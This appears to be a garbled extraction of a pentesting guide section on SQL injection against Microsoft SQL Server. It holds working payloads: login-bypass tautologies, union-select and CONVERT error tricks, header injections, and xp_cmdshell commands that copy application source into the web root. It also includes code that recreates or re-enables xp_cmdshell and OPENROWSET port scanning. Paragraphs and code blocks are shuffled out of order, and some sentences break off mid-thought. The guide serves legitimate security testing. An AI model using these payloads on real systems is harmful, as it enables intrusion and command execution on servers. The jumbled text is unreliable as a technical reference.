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Web Application Penetration Testing<br />

Web Application Penetration Testing<br />

How to Test<br />

SQL Server Characteristics<br />

To begin, let’s see some SQL Server operators and commands/stored<br />

procedures that are useful in a SQL Injection test:<br />

[1] comment operator: -- (useful for forcing the query to ignore the<br />

remaining portion of the original query; this won’t be necessary in every<br />

case)<br />

[2] query separator: ; (semicolon)<br />

[3] Useful stored procedures include:<br />

• [xp_cmdshell] executes any command shell in the server with the<br />

same permissions that it is currently running. By default, only sysadmin<br />

is allowed to use it and in SQL Server 2005 it is disabled by default<br />

(it can be enabled again using sp_configure)<br />

• xp_regread reads an arbitrary value from the Registry (undocumented<br />

extended procedure)<br />

• xp_regwrite writes an arbitrary value into the Registry (undocumented<br />

extended procedure)<br />

• [sp_makewebtask] Spawns a Windows command shell and passes<br />

in a string for execution. Any output is returned as rows of text. It requires<br />

sysadmin privileges.<br />

• [xp_sendmail] Sends an e-mail message, which may include a query<br />

result set attachment, to the specified recipients. This extended<br />

stored procedure uses SQL Mail to send the message.<br />

Let’s see now some examples of specific SQL Server attacks that use<br />

the aforementioned functions. Most of these examples will use the<br />

exec function.<br />

Below we show how to execute a shell command that writes the output<br />

of the command dir c:\inetpub in a browseable file, assuming that<br />

the web server and the DB server reside on the same host. The following<br />

syntax uses xp_cmdshell:<br />

exec master.dbo.xp_cmdshell ‘dir c:\inetpub > c:\inetpub\<br />

wwwroot\test.txt’--<br />

Alternatively, we can use sp_makewebtask:<br />

CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />

CONVERT will try to convert the result of db_name (a string) into<br />

an integer variable, triggering an error, which, if displayed by the<br />

vulnerable application, will contain the name of the DB.<br />

The following example uses the environment variable @@version<br />

, combined with a “union select”-style injection, in order to find the<br />

version of the SQL Server.<br />

/form.asp?prop=33%20union%20select%20<br />

1,2006-01-06,2007-01-06,1,’stat’,’name1’,’na<br />

me2’,2006-01-06,1,@@version%20--<br />

And here’s the same attack, but using again the conversion<br />

/controlboard.asp?boardID=2&itemnum=1%20AND%20<br />

1=CONVERT(int,%20@@VERSION)<br />

trick:Information gathering is useful for exploiting software vulnerabilities<br />

at the SQL Server, through the exploitation of an<br />

SQL-injection attack or direct access to the SQL listener.<br />

In the following, we show several examples that exploit SQL injection<br />

vulnerabilities through different entry points.<br />

Example 1: Testing for SQL Injection in a GET request.<br />

The most simple (and sometimes most rewarding) case would be<br />

that of a login page requesting an user name and password for<br />

user login. You can try entering the following string “’ or ‘1’=’1”<br />

(without double quotes):<br />

https:/vulnerable.web.app/login.asp?Username=’%20or%20<br />

’1’=’1&Password=’%20or%20’1’=’1<br />

POST https:/vulnerable.web.app/forgotpass.asp HTTP/1.1<br />

Host: vulnerable.web.app<br />

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;<br />

rv: Gecko/20060909 Firefox/ Paros/3.2.13<br />

Accept: text/xml,application/xml,application/xhtml+xml,text/<br />

html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />

Accept-Language: en-us,en;q=0.5<br />

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />

Keep-Alive: 300<br />

Proxy-Connection: keep-alive<br />

Referer: http:/vulnerable.web.app/forgotpass.asp<br />

Content-Type: application/x-www-form-urlencoded<br />

Content-Length: 50<br />

email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />

The error message obtained when a ‘ (single quote) character is entered<br />

at the email field is:<br />

Microsoft OLE DB Provider for SQL Server error ‘80040e14’<br />

Unclosed quotation mark before the character string ‘.<br />

/forgotpass.asp, line 15<br />

Example 4: Yet another (useful) GET example<br />

Obtaining the application’s source code<br />

a’ ; master.dbo.xp_cmdshell ‘ copy c:\inetpub\wwwroot\login.<br />

aspx c:\inetpub\wwwroot\login.txt’;--<br />

Example 5: custom xp_cmdshell<br />

All books and papers describing the security best practices for SQL<br />

Server recommend disabling xp_cmdshell in SQL Server 2000 (in SQL<br />

Server 2005 it is disabled by default). However, if we have sysadmin<br />

rights (natively or by bruteforcing the sysadmin password, see below),<br />

we can often bypass this limitation.<br />

ShellID OUT<br />

IF @OLEResult 0 SELECT @result = @OLEResult<br />

IF @OLEResult 0 RAISERROR (‘CreateObject %0X’, 14, 1, @<br />

OLEResult)<br />

EXECUTE @OLEResult = sp_OAMethod @ShellID, ‘Run’, Null,<br />

@cmd, 0, @Wait<br />

IF @OLEResult 0 SELECT @result = @OLEResult<br />

IF @OLEResult 0 RAISERROR (‘Run %0X’, 14, 1, @OLEResult)<br />

EXECUTE @OLEResult = sp_OADestroy @ShellID<br />

return @result<br />

This code, written by Antonin Foller (see links at the bottom of the<br />

page), creates a new xp_cmdshell using sp_oacreate, sp_oamethod<br />

and sp_oadestroy (as long as they haven’t been disabled too, of<br />

course). Before using it, we need to delete the first xp_cmdshell we<br />

created (even if it was not working), otherwise the two declarations<br />

will collide.<br />

On SQL Server 2005, xp_cmdshell can be enabled by injecting the following<br />

code instead:<br />

master..sp_configure ‘show advanced options’,1<br />

reconfigure<br />

master..sp_configure ‘xp_cmdshell’,1<br />

reconfigure<br />

Example 6: Referer / User-Agent<br />

Referer: https:/vulnerable.web.app/login.aspx’, ‘user_agent’,<br />

‘some_ip’); [SQL CODE]--<br />

The REFERER header set to:<br />

Allows the execution of arbitrary SQL Code. The same happens with<br />

exec sp_makewebtask ‘C:\Inetpub\wwwroot\test.txt’, ‘select *<br />

from master.dbo.sysobjects’--<br />

A successful execution will create a file that can be browsed by the pen<br />

tester. Keep in mind that sp_makewebtask is deprecated, and, even if<br />

it works in all SQL Server versions up to 2005, it might be removed in<br />

the future.<br />

In addition, SQL Server built-in functions and environment variables<br />

are very handy. The following uses the function db_name() to trigger<br />

an error that will return the name of the database:<br />

/controlboard.asp?boardID=2&itemnum=1%20AND%20<br />

1=CONVERT(int,%20db_name())<br />

Notice the use of [convert]:<br />

If the application is using Dynamic SQL queries, and the string gets<br />

appended to the user credentials validation query, this may result<br />

in a successful login to the application.<br />

Example 2: Testing for SQL Injection in a GET request<br />

In order to learn how many columns exist<br />

https:/vulnerable.web.app/list_report.aspx?number=001%20<br />

UNION%20ALL%201,1,’a’,1,1,1%20FROM%20users;--<br />

Example 3: Testing in a POST request<br />

SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />

A complete post example:<br />

On SQL Server 2000:<br />

• If xp_cmdshell has been disabled with sp_dropextendedproc, we<br />

can simply inject the following code:<br />

sp_addextendedproc ‘xp_cmdshell’,’xp_log70.dll’<br />

• If the previous code does not work, it means that the xp_log70.dll<br />

has been moved or deleted. In this case we need to inject the following<br />

code:<br />

CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @<br />

Wait int = 0) AS<br />

DECLARE @result int, @OLEResult int, @RunResult int<br />

DECLARE @ShellID int<br />

EXECUTE @OLEResult = sp_OACreate ‘WScript.Shell’, @<br />

User-Agent: user_agent’, ‘some_ip’); [SQL CODE]--<br />

select * from OPENROWSET(‘SQLOLEDB’,’uid=sa;pwd=foobar;-<br />

Network=DBMSSOCN;Address=x.y.w.z,p;timeout=5’,’select 1’)--<br />

the User-Agent header set to:<br />

Example 7: SQL Server as a port scanner<br />

In SQL Server, one of the most useful (at least for the penetration<br />

tester) commands is OPENROWSET, which is used to run a query on<br />

another DB Server and retrieve the results. The penetration tester can<br />

use this command to scan ports of other machines in the target network,<br />

injecting the following query:<br />

This query will attempt a connection to the address x.y.w.z on port p. If<br />

the port is closed, the following message will be returned:

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!